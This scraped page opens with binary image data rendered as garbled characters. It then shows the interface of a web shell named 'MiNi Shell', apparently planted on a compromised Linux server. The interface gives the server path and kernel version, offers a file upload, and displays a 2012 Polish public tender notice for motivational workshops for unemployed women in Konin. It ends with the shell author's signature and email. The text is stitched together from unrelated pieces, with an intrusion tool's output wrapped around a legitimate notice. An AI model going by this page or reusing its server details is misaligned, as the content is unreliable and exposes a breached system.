JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120322/66881-N-2012.html

<p class="kh_header"><b>Konin: NA ZLECENIE USŁUGI PRZEPROWADZENIA WARSZTATÓW 
AKTYWIZUJĄCO - MOTYWUJĄCYCH W RAMACH PROJEKTÓW: UWIERZ W SWÓJ SUKCES! ORAZ AKADEMIA KOBIET SUKCESU  W RAMACH POKL 6.1.1. (ZP-5/2012)</b><br>
<b>Numer ogłoszenia: 66881 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Regionalnego S.A. w Koninie , ul. Zakładowa 4, 62-510 Konin, woj. wielkopolskie, tel. 63 2453095, faks 63 2422229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arrkonin.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja Rozwoju Regionalnego S.A. w Koninie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NA ZLECENIE USŁUGI PRZEPROWADZENIA WARSZTATÓW 
AKTYWIZUJĄCO - MOTYWUJĄCYCH W RAMACH PROJEKTÓW: UWIERZ W SWÓJ SUKCES! ORAZ AKADEMIA KOBIET SUKCESU  W RAMACH POKL 6.1.1. (ZP-5/2012).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1	Przedmiotem zamówienia jest usługa przeprowadzenia 16 pięciodniowych (po 8 godzin lekcyjnych) warsztatów aktywizująco - motywujących w ramach projektów: Uwierz w swój sukces! oraz Akademia Kobiet Sukcesu współfinansowanych ze środków Unii Europej-skiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Ka-pitał Ludzki, Priorytet VI, Działanie 6.1, Poddziałanie 6.1.1. realizowanych przez Agencję Rozwoju Regionalnego S.A. w Koninie.
2.2	Zamówienie realizowane będzie dla 164 kobiet długotrwale bezrobotnych, zagrożonych wykluczeniem społecznym, z powiatu konińskiego i tureckiego, w dwóch cyklach po 8 grup, ra-zem  16 grup liczących od 7 do 15 osób.
2.3	Zakres zamówienia obejmuje przeprowadzenie warsztatów aktywizująco - motywujących, których celem jest:
-	zmotywowanie uczestniczek projektu do zmiany swej sytuacji życiowej,
-	rozwój umiejętności społecznych - wzmocnienie zdolności do samokształcenia i kre-atywności,
-	wzmocnienie poczucia własnej wartości oraz realistycznego postrzegania własnej osoby,
-	świadome kreowanie wizerunku poprzez znalezienie przez uczestniczki warsztatów własnego stylu i zdobycie wiedzy z zakresu autoprezentacji i wizażu.
Zajęcia mają przyczynić się do zwiększenia wśród uczestniczek wiary we własne umiejętności tworząc postawę pewności siebie.
2.4	W ramach warsztatów dla każdej z 16 grup zaplanowano następujące po sobie 2 moduły o następujących kierunkach:
2.4.1	Moduł I - warsztaty rozwoju osobistego:
-	komunikacja interpersonalna,
-	budowanie zaufania oraz poczucia własnej wartości i samooceny,
-	poczucie bezpieczeństwa w grupie,
-	wstępne rozpoznanie oczekiwań, umiejętności i możliwości,
-	ukierunkowanie na myślenie o własnym rozwoju,
-	uświadomienie znaczenia wiedzy i kompetencji w dokonywaniu ważnych wyborów,
-	radzenie sobie ze stresem i sytuacjami trudnymi,
-	radzenie sobie z własnymi uczuciami w sytuacjach trudnych,
-	przełamywanie barier tkwiących w nas, autoprezentacja.
W ramach modułu zaplanowano: 4 dni po 8 godzin lekcyjnych, w 16 grupach szkoleniowych- łącznie maksymalnie 512 godzin.
2.4.2	Moduł II - warsztaty kreowania własnego wizerunku:
-	elementy wizerunku wpływające na sukces,
-	psychologia koloru,
-	dobór stroju do typu sylwetki,
-	światło i kolor,
-	podstawy wizażu, czym jest profesjonalny wizerunek.
W ramach modułu zaplanowano: 1 dzień po 8 godzin lekcyjnych, w 16 grupach szkoleniowych - łącznie maksymalnie 128 godzin lekcyjnych.
2.5	Zamawiający dopuszcza możliwość realizacji warsztatów  w 3 grupach jednocześnie.
2.6	Warsztaty realizowane będą od poniedziałku do piątku w godzinach od 8.30 do 15.15 z uwzględnieniem przerwy kawowej i obiadowej.
2.7	Miejsce i termin odbywania się warsztatów: miasto Konin. Realizację warsztatów Zamawiają-cy planuje w okresie:
-	Cykl I - projekt Uwierz w swój sukces! - od kwietnia 2012 r. do maja 2012 r., (8 grup)
-	Cykl II - projekt Akademia Kobiet Sukcesu- od czerwca 2012 r. do sierpnia 2012 r. (8 grup)
na podstawie Harmonogramu (Załącznik nr 3 do umowy) zawierającego informacje dot. adre-sów sal szkoleniowych, terminów realizacji w poszczególnych grupach szkoleniowych oraz liczby uczestniczek w grupie.
2.8	Wykonawca zobowiązany jest do:
2.8.1	Przygotowania ramowego programu warsztatów i przekazania projektu do akceptacji Zamawiającego w ciągu tygodnia od podpisania umowy.
2.8.2	Opracowania materiałów szkoleniowych i przekazania projektu do akceptacji Zama-wiającego w ciągu tygodnia od podpisania umowy.
2.9	Zamawiający zobowiązuje się do: 
2.9.1	Zorganizowania 7 - 15 osobowych grup szkoleniowych.
2.9.2	Zapewnienia sal szkoleniowych.
2.9.3	Powielenia i przekazania w pierwszym dniu warsztatów poszczególnych grup szkole-niowych materiałów szkoleniowych.
2.9.4	Przekazania Wykonawcy wszystkich informacji będących w jego posiadaniu, nie-zbędnych do prawidłowego wykonania umowy.
2.9.5	Zapewnienia wyżywienia dla uczestniczek warsztatów oraz trenera prowadzącego.
2.9.6	Ubezpieczenia uczestniczek warsztatów na czas trwania szkolenia od następstw nie-szczęśliwych wypadków NW.
2.10	Wykonawca, w ramach realizacji usługi, jest zobowiązany do:
2.10.1	realizacji Umowy zgodnie z jej zapisami i złożoną Ofertą,
2.10.2	bieżącego prowadzenia dokumentacji przebiegu warsztatów zgodnej ze wzorami sta-nowiącymi: Dziennik zajęć - Załącznik nr 1 do Umowy, Karta pracy - Załącznik nr 2 do Umowy,
2.10.3	bieżącego informowania Kierownika Projektu o wszelkich trudnościach w realizacji projektu, w tym o odstępstwach od Harmonogramu (Załącznik nr 3 do umowy),
2.10.4	telefonicznego informowania Kierownika Projektu do godz. 9.00 o wszelkich nie-obecnościach uczestniczek podczas warsztatów w danym dniu,
2.10.5	powierzenia podwykonawstwa w realizacji przedmiotu Umowy, tylko w przypadku i zakresie określonym w złożonej Ofercie, 
2.10.6	wykonywania powierzonych zadań lojalnie i bezstronnie oraz zgodnie z zasadami ety-ki zawodowej Zamawiającego, dostępnymi na stronie: http://arrkonin.org.pl/32/471/kodeks_postepowania_etycznego,
2.10.7	prowadzenia działań informacyjnych kierowanych do uczestniczek warsztatów, informujących o finansowaniu realizacji projektu przez Unię Europejską w ramach Eu-ropejskiego Funduszu Społecznego.
2.10.8	przekazania na własność Zamawiającemu, wszystkich opracowań oraz innych materiałów sporządzonych przez Wykonawcę przy wykonaniu niniejszej umowy,
2.10.9	nie wykorzystywania udostępnionych dokumentów projektowych w innych celach niż do wykonania przedmiotu niniejszej umowy; naruszenie niniejszego zakazu skutkuje odpowiedzialnością odszkodowawczą na rzecz Zamawiającego,
2.10.10	zachowania poufności, nie ujawniania i nie wykorzystywania informacji uzyskanych przez Wykonawcę w trakcie realizacji niniejszej umowy,  jak również po jej ustaniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające zostanie udzielone na podstawie odrębnej umowy lub umów zawartych z Wykonawcą. Zamówienie uzupełniające może zostać udzielone w terminie 3 lat od dnia udzielenia zamówienia podstawowego. Wartość zamówienia uzupełniającego nie będzie przekraczać 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca posiada uprawnienia do wykona-nia zamówienia zgodnie z ustawą z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy - tekst jednolity: Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm., tj. posiada wpis do rejestru instytucji szkoleniowych. Ocena spełniania warunku odbędzie się na podstawie złożonego oświadczenia, na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże że w ciągu ostatnich 3 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres pro-wadzenia działalności jest krótszy - w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych wykonał część usługi, która obejmuje co najmniej 1 usługę szkoleniową spełniającą wszystkie poniższe warunki:
-	w ramach jednej usługi zrealizowano co najmniej 120 godzin lekcyjnych w formie warsztatów (np. 5 grup szkoleniowych X 3 dni X 8 godzin lekcyjnych),
-	tematyka warsztatów była zbliżona do przedmiotu zamówienia,
-	warsztaty skierowane były do minimum 50 osób w ramach jednej usługi, 
-	wartość jednej usługi wyniosła co najmniej 15 000 złotych brutto (w przypad-ku, gdy wartość umowy została określona w walucie innej niż złoty przeliczenie nastąpi według średniego kursu złotego ogłoszonego przez NBP i obowiązującego w dniu zawarcia umowy na realizację usługi). 
Ocena spełniania warunku odbędzie się na podstawie analizy treści wypełnionego formularza, łącznie z dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie oraz na podstawie złożonego oświadczenia, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu spełnienia tego warunku. Ocena spełniania warunku odbędzie się na podstawie złożonego oświadczenia, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony,  jeżeli Wykonawca przedstawi wykaz, co najmniej 6 trenerów posiadających tytuł magistra, (3 osoby na Moduł I - warsztaty rozwoju oso-bistego oraz 3 osoby na Moduł II - warsztaty kreowania własnego wizerunku), przy czym każda z tych osób w okresie ostatnich trzech lat przed upływem terminu składa-nia ofert przeprowadziła co najmniej 2 warsztaty spełniające wszystkie poniższe warunki:
-	czas trwania każdego z wykazanych warsztatów wyniósł co najmniej 3 dni,
-	tematyka warsztatów była zbliżona do przedmiotu zamówienia - odpowiednio Moduł I i Moduł II,
-	każde z wykazanych warsztatów skierowane były do minimum 10 osób.
Ocena spełniania warunku odbędzie się na podstawie na podstawie analizy treści wy-pełnionego formularza oraz na podstawie złożonego oświadczenia, na zasadzie speł-nia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę minimum  50 000 zł. Ocena spełniania warunku odbędzie się na podstawie złożonego dokumentu oraz na podstawie złożonego oświadczenia, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie trenerów w prowadzeniu warsztatów z tematyki zbliżonej do przedmiotu zamówienia - 20</li>
<li>3 - Doświadczenie Wykonawcy w realizacji usług z tematyki zbliżonej do przedmiotu zamówienia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień umowy w sytuacji, gdy:
	a) zmiana jest dla niego korzystna,
	b) w przypadku konieczności dostosowania postanowień umownych do zmian wynikających z nowelizacji powszechnie obowiązujących przepisów prawa z uwagi na brak możliwości reali-zacji umowy wedle pierwotnej jej treści lub z uwagi na rażącą stratę grożącą jednej ze stron,
	c) w przypadku wystąpienia sytuacji od stron niezależnej, niemożliwej do przewidzenia w chwili zawarcia umowy, a wprowadzenie zmiany jest konieczne dla prawidłowej realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.arrkonin.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rozwoju Regionalnego S.A. w Koninie, ul. Zakładowa 4, 62-510 Konin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 10:00, miejsce: Agencja Rozwoju Regionalnego S.A. w Koninie, ul. Zakładowa 4, 62-510 Konin, III piętro, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> POKL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com